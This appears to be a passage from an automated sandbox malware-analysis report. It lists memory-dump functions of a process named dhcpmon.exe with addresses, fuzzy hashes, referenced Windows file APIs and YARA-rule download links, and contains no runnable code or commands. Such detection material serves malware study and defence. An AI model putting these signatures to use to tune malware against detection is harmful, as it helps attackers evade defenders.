Uniqueness Score: -1.00%

Function 00F22228, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 959ad4eb6035da72e88edf8aaf81dbc04dbd43b4954b2a7c67c8dd3f4dd46e00
Instruction ID: 92ebc7bd027783e115396541d11ed6d62e96ff157cb6d19d7b4a56942072cee3
Opcode Fuzzy Hash: 959ad4eb6035da72e88edf8aaf81dbc04dbd43b4954b2a7c67c8dd3f4dd46e00
Instruction Fuzzy Hash: FDF028317041605FC3115F7DA894F6F7BA59BC9360F05406AED05CB282C921CC06E7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00F206C8, Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd95dc1af9b676829d90efc3c1a4cba5ab980e8af51deade083aeb0c3e191929
Instruction ID: 3175848aa4f66949842f978634324c588baa5eb991e1449582874bf789a2ec95
Opcode Fuzzy Hash: fd95dc1af9b676829d90efc3c1a4cba5ab980e8af51deade083aeb0c3e191929
Instruction Fuzzy Hash: 07F0A47530D6808FC7166B38E81C16D3FE29FCA222719409AE44ACB3F2DE254D079742

Uniqueness

Uniqueness Score: -1.00%

Function 00F21CC8, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9b6412b2bbefa8f00843cee7be0e016402f70135248ff4b8f8c5042a2e2880e
Instruction ID: 6074e6e110a7ae879ffa114eab73d4d5f50ce22afb39ce72120497e9a7faaf4b
Opcode Fuzzy Hash: c9b6412b2bbefa8f00843cee7be0e016402f70135248ff4b8f8c5042a2e2880e
Instruction Fuzzy Hash: DBF04F357141508FC744ABBCD428B6A3BE6AF89315B1880AAE50ACB3A6DE759C44CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00F21D58, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 387d158b1a1df858f049bc7183ffe296b70d0ac3e68972bcf1321fa4ff51decc
Instruction ID: 424fdbf9c156f48a9f25b380a96ebf6af9813551259a759b39e0fe9e1963d956
Opcode Fuzzy Hash: 387d158b1a1df858f049bc7183ffe296b70d0ac3e68972bcf1321fa4ff51decc
Instruction Fuzzy Hash: 2FF09A357001268BC648BB7AD021B7E37DBABC92603640529D506CB384EF28DD019BDA

Uniqueness

Uniqueness Score: -1.00%

Function 00F21CD8, Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b1af5ef7730d3cad2b2a70945607e19b822ab418e7253a93c93dca82ceee4f
Instruction ID: e2602f7d1c0f4bd7fcff1790127c7fe7ad01c60ad2be8f23adb35b8e49f5e27f
Opcode Fuzzy Hash: 09b1af5ef7730d3cad2b2a70945607e19b822ab418e7253a93c93dca82ceee4f
Instruction Fuzzy Hash: A7F05E317101208FC744ABBCD418A6E3AEAAFC8755B2440AAE50ACB3A5DE72DC40C791

Uniqueness

Uniqueness Score: -1.00%

Function 00F21E43, Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92829748edb2ea12fd0f0adbcf05d540c07610734dd481e896bb6377997bfab
Instruction ID: 08ef015dd9535055dc37050a9ae2e32447765b60b02e5b0d65efbc6fdb482a41
Opcode Fuzzy Hash: a92829748edb2ea12fd0f0adbcf05d540c07610734dd481e896bb6377997bfab
Instruction Fuzzy Hash: 47F0823531D2905FC706DB7CE89889F7FA6EFCA21031644BBE54ACB266CAB14D05D760

Uniqueness

Uniqueness Score: -1.00%

Function 00F20640, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36d62874d03ac069353fd4ed73fd56b0cc3ed3ded04c1f683afed85a308e2857
Instruction ID: 55edfe259d1e217e1a7c668b450417b4c56cf717f3a7a29097fe473d493718b1
Opcode Fuzzy Hash: 36d62874d03ac069353fd4ed73fd56b0cc3ed3ded04c1f683afed85a308e2857
Instruction Fuzzy Hash: 43E065317185104B4719BB3DD81C52E77D79BC9621315807AE90BC73A0DE204D025796

Uniqueness

Uniqueness Score: -1.00%

Function 00F21E50, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d782f3ff519bea1ef290531b15e8e6ae6dc387571b2ddba197146330fa8c7e8
Instruction ID: cc0a15610c95bab5e0bcaaff55b694c7f6eb1e0b3e80adba59ba90900b030d8b
Opcode Fuzzy Hash: 8d782f3ff519bea1ef290531b15e8e6ae6dc387571b2ddba197146330fa8c7e8
Instruction Fuzzy Hash: 4DE0E5353151046BC714EB6DE84485F7B9AEBC92513518436B50AC7314DEB19D059760

Uniqueness

Uniqueness Score: -1.00%

Function 027E05F6, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228234633.00000000027E0000.00000040.00000040.sdmp, Offset: 027E0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a7c0565be910682e111adc873710c889344a100e2f43cb4a18ed4475f59a8c
Instruction ID: 17091d1215f9f34a5b4dc8766dc47d0bf6d3917aeae3461370d89f7cebc55023
Opcode Fuzzy Hash: 85a7c0565be910682e111adc873710c889344a100e2f43cb4a18ed4475f59a8c
Instruction Fuzzy Hash: 1AE06D766006008B9650CF0BEC41452F798EB88630B18C06FDD0D8B700E235B5048EA5

Uniqueness

Uniqueness Score: -1.00%

Function 00F21EEB, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ba6c687f0bcbac90c3b38e02a2692f8207d8cf94cc3f1dcec6c0a9a0f90f559
Instruction ID: 9c51bfedf90af9e48633039e208c347ff41ba6942dbd56ed44843277589b2a61
Opcode Fuzzy Hash: 8ba6c687f0bcbac90c3b38e02a2692f8207d8cf94cc3f1dcec6c0a9a0f90f559
Instruction Fuzzy Hash: 05E092352083804FC31567BDA424A6E7FEACFCA31071840AFE546C73A6C9B55C068751

Uniqueness

Uniqueness Score: -1.00%

Function 00F21EF8, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09cda8abbe8e88678c0563da54a2dd341f249b678c0f89f9d4e58c13e779a9f6
Instruction ID: 0c92a9e000013a8bfe8fcedea02d072fcf5e387cd890e5308cd245532b1b52d5
Opcode Fuzzy Hash: 09cda8abbe8e88678c0563da54a2dd341f249b678c0f89f9d4e58c13e779a9f6
Instruction Fuzzy Hash: 3BE0C2363002108BC30872AEE414A5F77DECBCA321B14407BF109C7391CEB5AC4147E5

Uniqueness

Uniqueness Score: -1.00%

Function 00F20251, Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7a2b3058fdb40e1668a3b21b114c82d5dd626553811a18e5b469e97023aab9c
Instruction ID: 36d724fc5d7663752e44a785f364ade3fab105a09f2b71d18429d12d2e2f79cb
Opcode Fuzzy Hash: d7a2b3058fdb40e1668a3b21b114c82d5dd626553811a18e5b469e97023aab9c
Instruction Fuzzy Hash: 5FD0C937B000208FDB0096ADF8042ECBBA1AFC4325B20107AD60ADB651E9218D199601

Uniqueness

Uniqueness Score: -1.00%

Function 00F21E0F, Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15a045438e9a7dc6ddeec7580c078511e33315d6652d53afb0e526493fcb3f4c
Instruction ID: 2c783eac92e3169316d3513b99d34a71ba50ab03ef86490c91b83a32311b857b
Opcode Fuzzy Hash: 15a045438e9a7dc6ddeec7580c078511e33315d6652d53afb0e526493fcb3f4c
Instruction Fuzzy Hash: 74D01274409302AFC701CF54D88AA9ABBF4EF41600F04C56EA88D8A115E779565EDB12

Uniqueness

Uniqueness Score: -1.00%

Function 00F20130, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67f27560a1d9e69aa45315e2c27750f22ba5bf473c6d693f9456af5bf1c91cc4
Instruction ID: b76e000de82b6539848b1493dde62688d250598b874b21c908ff083bacce4289
Opcode Fuzzy Hash: 67f27560a1d9e69aa45315e2c27750f22ba5bf473c6d693f9456af5bf1c91cc4
Instruction Fuzzy Hash: BEC08C3175860807DA101AF8B884326328C8780314F000422A40DC6161EC29D8905240

Uniqueness

Uniqueness Score: -1.00%

Function 00F21E20, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.228204854.0000000000F20000.00000040.00000001.sdmp, Offset: 00F20000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb8a12beda6d38dd634ad6f14773bdabdcc2063da674844c3a05cae1c5b53bfc
Instruction ID: dd92363d6013c966a7194965f9f6564fd9595abcbbe4c96da1d6dd7682dedea2
Opcode Fuzzy Hash: cb8a12beda6d38dd634ad6f14773bdabdcc2063da674844c3a05cae1c5b53bfc
Instruction Fuzzy Hash: B7C01270418201AFC740EF28EC4596B7BF0EA80605F44C92DE48DC2110F270561CCB52

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: dhcpmon.exe PID: 5588 Parent PID: 3388 dhcpmon.exeCOMMON

Executed Functions

Function 0118A2C1, Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0118A371

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4f5736ba744fa45347f15999aa2fae33ab1dd474e26b24a2ea2a90e8522f09d1
Instruction ID: 075a4e82d85710bbfeaf97d2f13893cfe8923b8d3cfd83275a23f727a89a01ae
Opcode Fuzzy Hash: 4f5736ba744fa45347f15999aa2fae33ab1dd474e26b24a2ea2a90e8522f09d1
Instruction Fuzzy Hash: EE316E75509380AFE722CF65DC85F56BFF8EF06610F0884AEE9858B252D365E809CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0118A2F2, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0118A371

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ea7d40938dd038310e889e48ecca43e8da8302266143f4f89d3172f97ccddd83
Instruction ID: a36196e89cdb76354148f2cc3b1f45ba164fa9072afb57ff80fb683336428778
Opcode Fuzzy Hash: ea7d40938dd038310e889e48ecca43e8da8302266143f4f89d3172f97ccddd83
Instruction Fuzzy Hash: DC217A75504640AFEB25DF69DC85B66FBE8EF08610F18846AEE858B252D3B1E804CF61

Uniqueness

Uniqueness Score: -1.00%

Function 0118AE40, Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 0118AED6

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: c88365f3daa866227cf477f35babca365586f69a948e4db7c4412ac9e25a760e
Instruction ID: 8040106a9e65e13a474bd2afe716b9d8fbeaa158c64927df38b06ee6d1c8d0a8
Opcode Fuzzy Hash: c88365f3daa866227cf477f35babca365586f69a948e4db7c4412ac9e25a760e
Instruction Fuzzy Hash: 8121A7754097806FD3138B25DC51F62BFB4EF87B10F0981DBE8848B553D224A919C7B6

Uniqueness

Uniqueness Score: -1.00%

Function 0118A483, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,125015E8,00000000,00000000,00000000,00000000), ref: 0118A509

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 8eeaed9a32d73a3b6ef6adea780288a84c57821d81499cbcf60f262f69c70b63
Instruction ID: ceb0725de736d49ba6cc7cef5e4b1532d8d8dd4dc0ff37dceb1a08dc7cbe59f0
Opcode Fuzzy Hash: 8eeaed9a32d73a3b6ef6adea780288a84c57821d81499cbcf60f262f69c70b63
Instruction Fuzzy Hash: DA21C3B64083806FE7128B25DC40FA6BFA8DF47310F1880DBE9849B253D264A909CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0118A3C8, Relevance: 1.6, APIs: 1, Instructions: 71COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0118A43C

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 04258c562f8f4ca9772cd33cbf362f39a9a55d798a2bf76b8d43a2405c158bd6
Instruction ID: ba798bf843ded9eb8f824fb6b85db9d9a3f43a28b3729358cf0bca32347770c2
Opcode Fuzzy Hash: 04258c562f8f4ca9772cd33cbf362f39a9a55d798a2bf76b8d43a2405c158bd6
Instruction Fuzzy Hash: B421C2B590A3C05FDB138F25DC95652BFA49F07220F0980DBED858F2A3D2645908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0118A816, Relevance: 1.6, APIs: 1, Instructions: 70fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,125015E8,00000000,00000000,00000000,00000000), ref: 0118A895

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: f25a91f917f5d7f5281aaf8ab428efa7941a294d59c994291686fdeebfd19f04
Instruction ID: 3cab9ddd0376a6ccbdee432502ec281549df2257684b4241aa5904e579fca3d2
Opcode Fuzzy Hash: f25a91f917f5d7f5281aaf8ab428efa7941a294d59c994291686fdeebfd19f04
Instruction Fuzzy Hash: BB216272405344AFEB228F55DC44F57FFB8EF46310F08849BEA459B152C265A509CB71

Uniqueness

Uniqueness Score: -1.00%

Function 0118AA16, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0118AA87

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: 5cc3f06756302a495760ab599ac1419416efd25434a5d90d4097f1c77ed2a586
Instruction ID: a34c6c176126e89dffb53e45b60dae257b68293678e355e09f853d6f79d4aab6
Opcode Fuzzy Hash: 5cc3f06756302a495760ab599ac1419416efd25434a5d90d4097f1c77ed2a586
Instruction Fuzzy Hash: 7E2190714493849FD7128F25DC45B52FFB4EF06210F0984DBDD848F253D2799909CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0118A836, Relevance: 1.6, APIs: 1, Instructions: 60fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E2C,125015E8,00000000,00000000,00000000,00000000), ref: 0118A895

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: a8a40ee29c47e0d6c316e3d175827db4ade1f3581111484c7c1ffd5a52d1f2d7
Instruction ID: 7ad79d9638b9eeee1efdaea2236cccb9957ac99ec8339b65cea0355a0ff38ad6
Opcode Fuzzy Hash: a8a40ee29c47e0d6c316e3d175827db4ade1f3581111484c7c1ffd5a52d1f2d7
Instruction Fuzzy Hash: A611BF72400204AFEB219F55EC80FAAFBA8EF45321F14C46BEE459B251C674A4098BB2

Uniqueness

Uniqueness Score: -1.00%

Function 0118AAD8, Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0118AB3D

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 892b218b3a0d7cdc60a7c0b56a80b3f540b10443e90132720e953ed30f43cf7e
Instruction ID: d4852222e8d195a9c29eeb7028a295ae8ed2ea1786c483526890833944d4148d
Opcode Fuzzy Hash: 892b218b3a0d7cdc60a7c0b56a80b3f540b10443e90132720e953ed30f43cf7e
Instruction Fuzzy Hash: 33119072504780AFDB228F19DC44B62FFF8EF46610F08C49EED858B253D261A908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0118A8DF, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 0118A949

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 62109f92e70e13fc9e48ee3874da76461c233e1a678ac652a8e45d2b6ead2d78
Instruction ID: a0ead588420a701a7b3280be2ea2533213cdbc53d9b810d72924fed30309ec96
Opcode Fuzzy Hash: 62109f92e70e13fc9e48ee3874da76461c233e1a678ac652a8e45d2b6ead2d78
Instruction Fuzzy Hash: 0B119D754093C45FD7128B29DC85B92BFA4AF03324F0A80DADD844F153D264A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0118A4B6, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E2C,125015E8,00000000,00000000,00000000,00000000), ref: 0118A509

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 5c36941afd8a51e0ee94ad171dc33304def7f0f9153c1df633ac0927eb19d9e5
Instruction ID: b57bcb5fedf8b1f0f273d070dc360bee72d0af3eed86ef6418729dd68ad0250e
Opcode Fuzzy Hash: 5c36941afd8a51e0ee94ad171dc33304def7f0f9153c1df633ac0927eb19d9e5
Instruction Fuzzy Hash: DB01D272500604AFE721DB19EC85FA7FBA8DF45720F14C09BEE059B241D7B4A5498EB2

Uniqueness

Uniqueness Score: -1.00%

Function 0118A23C, Relevance: 1.5, APIs: 1, Instructions: 49COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0118A290

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: adfce4047b5c15fdc6ba424beb74906e24986b50e500590df096e02edcf8c351
Instruction ID: e7cde4935a2cb4e7595b1ebb701a954a82d738d8ad401c373180fe0a8faeb7fb
Opcode Fuzzy Hash: adfce4047b5c15fdc6ba424beb74906e24986b50e500590df096e02edcf8c351
Instruction Fuzzy Hash: AA115E71409384AFD7228B15DC84B62BFA4DF46624F0880DBED858B253D275A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0118AAFA, Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

GetFileVersionInfoW.KERNELBASE(?,?,?,?), ref: 0118AB3D

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileInfoVersion
String ID:
API String ID: 2427832333-0
Opcode ID: 306e1d299f3e2fb6276b8461a237fbbc141e8ea13ea1c37d907964d00a6956e3
Instruction ID: d7979d99629b819ceb2d065e6e6d3529b249516eba012914d1d4aad0b90e9840
Opcode Fuzzy Hash: 306e1d299f3e2fb6276b8461a237fbbc141e8ea13ea1c37d907964d00a6956e3
Instruction Fuzzy Hash: D6018C325006009FDB259F29E884B56FFE4EF05620F08C4ABDE4A8B652D371E848CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0118AA4A, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.KERNELBASE(?,?), ref: 0118AA87

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: FileInfoSizeVersion
String ID:
API String ID: 1661704012-0
Opcode ID: 48a0ee0dcd963196774cfe1c7ff27dc28e75b7d0a3b464fdd6f61eac2cb4547a
Instruction ID: 851dfaf68caa2b5f28d6451aadd7654961236b3d10eb7827dff0d84b0ebce532
Opcode Fuzzy Hash: 48a0ee0dcd963196774cfe1c7ff27dc28e75b7d0a3b464fdd6f61eac2cb4547a
Instruction Fuzzy Hash: 8B0171759002449FEB24DF59E984766FFD4EF44220F18C4ABDD498B606D775E404CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0118A40A, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0118A43C

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a39276a4d0990be79cf8852d5d212f3acd285b5294cc6c031787c906430fb9e1
Instruction ID: 393b01234ee64166ed29efeff207c68bba5a6fd992ddfebed8d59745777b9278
Opcode Fuzzy Hash: a39276a4d0990be79cf8852d5d212f3acd285b5294cc6c031787c906430fb9e1
Instruction Fuzzy Hash: 88018F719002449FDB25DF29E888766FF94DF44220F18C4ABDE498F652D775A808CF62

Uniqueness

Uniqueness Score: -1.00%

Function 0118AE86, Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

VerLanguageNameW.KERNELBASE(?,00000E2C,?,?), ref: 0118AED6

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: LanguageName
String ID:
API String ID: 2060303382-0
Opcode ID: 8820afce0c077e4d5a7b846cdeeea061e91454ca56eb740abd35ecba385d00ec
Instruction ID: e46642e75be6daacccfd899b1b185caf50374d86e94cd2b88c2c60df60546fdf
Opcode Fuzzy Hash: 8820afce0c077e4d5a7b846cdeeea061e91454ca56eb740abd35ecba385d00ec
Instruction Fuzzy Hash: F1014F76540600ABD214DF16DC86F26FBA8EB88B20F14815AED085B741E371B915CAA6

Uniqueness

Uniqueness Score: -1.00%

Function 0118A25E, Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(?), ref: 0118A290

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 1c9e7d72ff49c8cf4db7fd9930e7d5f4cceae2a6151580ef8c684e14b2fda1de
Instruction ID: 7c5479c6dd079bceee5813cb9b0397a8f76a344837f184768235fbad775a1b9a
Opcode Fuzzy Hash: 1c9e7d72ff49c8cf4db7fd9930e7d5f4cceae2a6151580ef8c684e14b2fda1de
Instruction Fuzzy Hash: 2FF0AF35804644DFDB259F59E884766FFA0EF04720F18C09BDD494B312D3B6A408CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 0118A91A, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNELBASE ref: 0118A949

Memory Dump Source

Source File: 0000000E.00000002.249503682.000000000118A000.00000040.00000001.sdmp, Offset: 0118A000, based on PE: false

Similarity

API ID: ConsoleOutput
String ID:
API String ID: 3985236979-0
Opcode ID: 14cef3da6d64033ac604cbb8482a2e2e5cbe6483343efaa125df3b868057d062
Instruction ID: 87f32c3ca05ccd65f3aeddb0ea03df7611ae95f8b418ac5166bc31d8be1e384e
Opcode Fuzzy Hash: 14cef3da6d64033ac604cbb8482a2e2e5cbe6483343efaa125df3b868057d062
Instruction Fuzzy Hash: 69F0AF358046449FD7149F19E885766FF90DF04620F19C09BDE494F202E3B5A408CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 05051B02, Relevance: 1.5, Strings: 1, Instructions: 215COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 05051B58

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: 359917ca17c594be936767d03148077cc38cd4f654568659bd69a840c54e2def
Instruction ID: 126b15d395d33a31df0ef69506f1bcd26c835ea501e8fdeac2882da44f733af6
Opcode Fuzzy Hash: 359917ca17c594be936767d03148077cc38cd4f654568659bd69a840c54e2def
Instruction Fuzzy Hash: C271AF30700210DFD768DB25E854B7F7BE6BB85320F15856AE99ACB281DB76EC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05050150, Relevance: 1.3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

Strings

:@Dr, xrefs: 050501A7

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID: :@Dr
API String ID: 0-3830894600
Opcode ID: 259b00b5c26dde6b397ba20931df5fd8e36669b1c3bdce481424b37b01d6b4f6
Instruction ID: 2e87cd50d3b081cdb5bd01297a7e635de91a3edc040844042bc803e8d7677fc5
Opcode Fuzzy Hash: 259b00b5c26dde6b397ba20931df5fd8e36669b1c3bdce481424b37b01d6b4f6
Instruction Fuzzy Hash: 53214476A11108ABDB19DFB6E9449DEBBFAFF88310F148136E525F3224EB3159418B90

Uniqueness

Uniqueness Score: -1.00%

Function 05051540, Relevance: .2, Instructions: 168COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9ef1316cac23617338ac8fecafdf97622cc9366b817563497ee4272ee71d578
Instruction ID: 7a6ef31d05ae00ddc99f88cea4b5dfb5f95f1c7ee2e55cb2fd10725388b33a4c
Opcode Fuzzy Hash: f9ef1316cac23617338ac8fecafdf97622cc9366b817563497ee4272ee71d578
Instruction Fuzzy Hash: D5519B347002158FDB58AB38E41876E3BE7AFC8360F158076D926D7398DE749D86CB91

Uniqueness

Uniqueness Score: -1.00%

Function 05050006, Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae70bf8659ec663c23a5eb1e3a45337f0724d4fb5dde16bb8e3215cc0d28aba2
Instruction ID: 9fd65e06b084e76c1efcef2c7853d2cbabc5661634d5c01cb41ced3c27724eb9
Opcode Fuzzy Hash: ae70bf8659ec663c23a5eb1e3a45337f0724d4fb5dde16bb8e3215cc0d28aba2
Instruction Fuzzy Hash: 3631A2755093804FD706A774DC5572A3FB1EF82309F1A85AED481CB2E6EB78884AC753

Uniqueness

Uniqueness Score: -1.00%

Function 05051453, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.250212758.0000000005050000.00000040.00000001.sdmp, Offset: 05050000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
